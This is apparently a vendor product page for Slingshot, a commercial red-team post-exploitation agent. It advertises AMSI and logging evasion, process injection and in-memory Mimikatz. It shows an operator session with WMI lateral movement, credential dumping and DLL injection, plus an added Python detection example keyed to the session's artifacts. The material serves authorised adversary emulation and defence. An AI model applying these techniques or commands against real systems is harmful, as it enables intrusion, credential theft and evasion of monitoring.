RED TEAM TOOLKIT

SLINGSHOT

Slingshot is a post-exploitation agent (stage 2) used by red teams
to conduct advanced network operations

Level Up Your Post Exploitation Skills!

Built with OpSec as a first priority, Slingshot empowers teams to more accurately emulate sophisticated adversaries. Capable of zero process creation, malleable network profiles, syscall process injection, memory obfuscation, and blended HTML traffic, Slingshot makes no compromises. It enables operations to run with a limited detection surface, powerful modularity, and ephemeral concepts.

Looking to step up your game? Slingshot is the perfect fit.

python slingshot.py
  ___ _ _              _        _   
 / __| (_)_ _  __ _ __| |_  ___| |_ 
 \__ \ | | ' \/ _` (_-< ' \/ _ \  _|
 |___/_|_|_||_\__, /__/_||_\___/\__|
              |___/        v2.00.0
                  
 Notes: New features and bug fixes.
     
[+] Using the 'primary' profile
[+] Prepared 32 modules
[+] Blended obfuscation is enabled!
[+] HTTP/S server is running (0.0.0.0)
[+] Switching NOqgdSTZaa to a derived key
[+] Added new HTTPS target 'NOqgdSTZaa' from 8.8.8.8 at 22:06:07 on Jan 01
[+] Getting intitial target info
getpid
PID:  4238
Arch: x64
User: JOHN-PC\Admin
Image: C:\Windows\System32\explorer.exe
    
script download
[+] Login succeeded
[+] Downloaded scripts
run modestmouse ADAM-LAPTOP wmi
[+] Sometimes it pays to KISS ...
[+] Architecture is x64
[+] Uploading stager to C:\Windows\TypeScr.lib
[+] Using WMI for execution ...
[+] Calling Win32_Process::Create
[+] Pushing payload to the stager
[+] Removing the stager at C:\Windows\TypeScr.lib
[+] Finished. Use `link` if this was a SMB target.
link ADAM-LAPTOP
[+] Attempting to link up ...
[+] Re-linked to R9j8segDnQ
[!] Failed to connect to \\ADAM-LAPTOP\pipe\prtsvc
[!] Failed to connect to \\ADAM-LAPTOP\pipe\msftpn
interact R9j8segDnQ
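The session above leaves host-side artifacts a defender can key on: a stager written to C:\Windows\TypeScr.lib, a process created through WMI's Win32_Process::Create, and link attempts to the named pipes prtsvc and msftpn. As an added example that is not part of the Slingshot page or toolkit, the following Python runs three detection rules over constructed Sysmon-style events; the flattened field layout, the sample file names and the CONSTRUCTED_CHILD.exe process are assumptions, while the pipe names and stager path are taken from the output above and may differ per deployment.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon-style events (not real telemetry), flattened to
# "EventID|Image|ParentImage|TargetFilename|PipeName". Event 11 is
# FileCreate, 1 is ProcessCreate, 17/18 are PipeCreated/PipeConnected.
SAMPLE_EVENTS = [
    "11|System||C:\\Windows\\TypeScr.lib|",
    "1|C:\\Windows\\System32\\CONSTRUCTED_CHILD.exe|C:\\Windows\\System32\\wbem\\WmiPrvSE.exe||",
    "18|C:\\Windows\\explorer.exe|||\\prtsvc",
    "18|C:\\Windows\\explorer.exe|||\\msftpn",
    "11|C:\\Program Files\\App\\setup.exe||C:\\Program Files\\App\\app.dll|",
    "17|C:\\Windows\\System32\\spoolsv.exe|||\\spoolss",
    "1|C:\\Windows\\System32\\notepad.exe|C:\\Windows\\explorer.exe||",
]

# Indicators lifted from the session output on this page.
SUSPECT_PIPES = {"\\prtsvc", "\\msftpn"}
# A .lib dropped directly into the C:\Windows root, as the stager was.
WINDOWS_ROOT_LIB = re.compile(r"^C:\\Windows\\[^\\]+\.lib$", re.IGNORECASE)
WMI_PROVIDER_HOST = "wmiprvse.exe"


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a Finding for every event matching one of the three rules."""
    findings = []
    for line in events:
        event_id, image, parent, target, pipe = line.split("|", 4)
        event_id = int(event_id)
        # Rule 1: file written directly under C:\Windows with a .lib name.
        if event_id == 11 and WINDOWS_ROOT_LIB.match(target):
            findings.append(Finding(event_id, "windows_root_lib_drop", target))
        # Rule 2: child of the WMI provider host, which is how a remote
        # Win32_Process::Create call shows up in process-creation telemetry.
        if event_id == 1 and basename(parent) == WMI_PROVIDER_HOST:
            findings.append(Finding(event_id, "wmi_process_create", image))
        # Rule 3: pipe create/connect using the pipe names from the SMB link.
        if event_id in (17, 18) and pipe in SUSPECT_PIPES:
            findings.append(Finding(event_id, "c2_named_pipe", pipe))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Rule 1 is deliberately narrow to the artifact shown here; in production you would baseline writes to the C:\Windows root rather than match one extension.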

Scripted Techniques

The agent is built in C++ with a Python 3 listening post/server. All C2 is compressed, encrypted, and validated with modern primitives. In addition to HTTP/S comms, SMB is supported for inter-network pivoting and host-to-host communication. Ever needed to be 8 hops deep for exfil? We have too.

Rather than basic lateral movement techniques obscured behind commands, we supply multiple pivoting techniques via a hosted repository of Slingshot scripts. Every capability in Slingshot is exposed with a dead simple Python library. This allows teams to automate any part of their operation with custom Slingshot scripts. Feeling tricky? Crack open the scripts for reference and modification.

Serious About Modularity

Modularity is a core design principle for Slingshot. In addition to modules we supply, such as Mimikatz and an in-memory keylogger, you can inject any native custom DLL into a local process or remote memory.

These in-memory modules remain stealthy while in use. For instance, while loaded, Mimikatz is constantly obfuscated in memory. This helps avoid basic signatures which might compromise operations. Remember, opsec first!

mimikatz load
[+] Completed successfully
mimikatz coffee
  ( (
   ) )
.______.
|      |]
\      /
 `----'  
            
mimikatz sekurlsa::logonpasswords
    Authentication Id : 0 ; 335132 (00000000:00051d1c)
    Session           : Interactive from 1
    User Name         : John
    Domain            : JOHN-PC
    Logon Server      : JOHN-PC
    Logon Time        : 1/01/1997 1:40:29 PM
    
        tspkg :	
         * Username : John
         * Domain   : JOHN-PC
         * Password : P@ssword0ne
         ...
            
inject -p explorer.exe exploit.dll
[+] Completed succesfully
loadassembly rubeus.dll
[+] Completed succesfully
callassembly -m Rubeus.Program.Execute hash /password:Password123!
     ______        _
    (_____ \      | |
     _____) )_   _| |__  _____ _   _  ___
    |  __  /| | | |  _ \| ___ | | | |/___)
    | |  \ \| |_| | |_) ) ____| |_| |___ |
    |_|   |_|____/|____/|_____)____/(___/
    
    v1.4.0
    
    
    [*] Action: Calculate Password Hashes
    
    [*] Input password   : Password123!
    [*]       rc4_hmac   : 2B576ACBE6BCFDA7294D6BD18041B8FE   
            
powershell load
[+] Completed succesfully
powershell Get-Host
    Name                           Value                  
    ----                           -----                  
    PSVersion                      5.1.18362.145          
    PSEdition                      Desktop                
    PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
    BuildVersion                   10.0.18362.145         
    CLRVersion                     4.0.30319.42000        
    WSManStackVersion              3.0                    
    PSRemotingProtocolVersion      2.3                    
    SerializationVersion           1.1.0.1     
            

.NET Safe Haven

Slingshot has a sophisticated system for loading assemblies into the .NET Runtime (CLR). This system supports simultaneous modules and cross-version support with simple management. You can convert, author, and re-use advanced .NET code directly in Slingshot without creating external processes or constantly re-staging code.

Pre-built modules like in-memory PowerShell and SOCKS proxying make use of this integration to hyperextend Slingshot's functionality. Defensive protections such as ETW tracing, PowerShell logging, and AMSI are all handled transparently by Slingshot to reduce detection surface.

Extensible And Modular

Slingshot can load and execute PowerShell scripts and .NET assemblies in memory, extending functionality and automating routine tasks. Scripts and assemblies are loaded and executed in a way that bypasses AMSI and script block logging.

Covert Communication

Slingshot has malleable communication profiles, meaning operators can quickly and easily modify detailed aspects of the C2 traffic including HTTP headers, POST/GET pages and parameters, compression, connection wait times, and much more.

Python Scripting Engine

The Slingshot LP is built in Python 3. Operators can easily build and run custom Python scripts on targets to analyze command output, conduct host pivots, collect target data, or perform virtually any command in an automated fashion.

Windows API Integration

Many routine operator commands have been integrated directly into Slingshot through the use of Windows APIs. This allows operators to maintain operational security by avoiding appearing in the process list or the use of cmd.exe.

Command Logging

All commands and corresponding output are logged and timestamped. This allows red and blue teams to analyze target data, align timelines, and develop remediation plans.

Great Support

Slingshot is developed by the Silent Break Security team and used in cyberoperations continually. Development is constant as new features and improvements are pushed to the production version. Got ideas? We want to hear them!

Quick Facts

What does it cost?

RTT licenses cost $6,000 per user for the first year. Subsequent license renewals cost $3,000 per user per year.

I took the Dark Side Ops training and already have Slingshot. Is this version different?

Yes! The version of Slingshot in RTT is much more functional. Just see the features list above, or contact us for more details.

Does RTT include source code?

The Slingshot LP (i.e. the server) source code is included in RTT. In addition, scripts provided by our team will be open source and available for study. The Slingshot agent (i.e. the client) consists of several compiled binaries, patched with callback domain data.

We already have tool xyz! Why do we need another red team tool?

Maybe you don’t! There are some great red team tools out there and if you’re able to conduct adversary simulations without getting caught using your current tool chain, then great! We believe offense-in-depth is a necessary part of effective operations, and that the features and capabilities included in RTT are absolutely worth it.

Do you offer volume discounts?

Yes! Send us an email and we’ll help you out with custom pricing.

Can I get a demo? How about a trial?

Sure! Contact us to set up a demo or ask any additional questions. Also check out our YouTube Channel for videos showcasing the latest features and functionality. Currently, trial licenses are not provided.

Is there documentation? How about tutorials?

Documentation is maintained in the RTT Client Portal. It includes detailed tool usage and functionality, Slingshot Python scripting examples, and license information. Tutorials can be found on our YouTube Channel.
